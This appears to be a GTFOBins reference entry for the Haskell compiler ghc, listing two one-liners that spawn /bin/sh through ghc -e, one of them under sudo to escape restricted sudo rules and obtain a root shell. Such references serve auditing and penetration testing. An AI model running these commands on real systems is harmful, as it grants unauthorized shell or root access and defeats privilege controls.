GTFOBins.github.io/_gtfobins/ghc.md

8 lines
157 B
Markdown

---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/sh"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/sh"'
---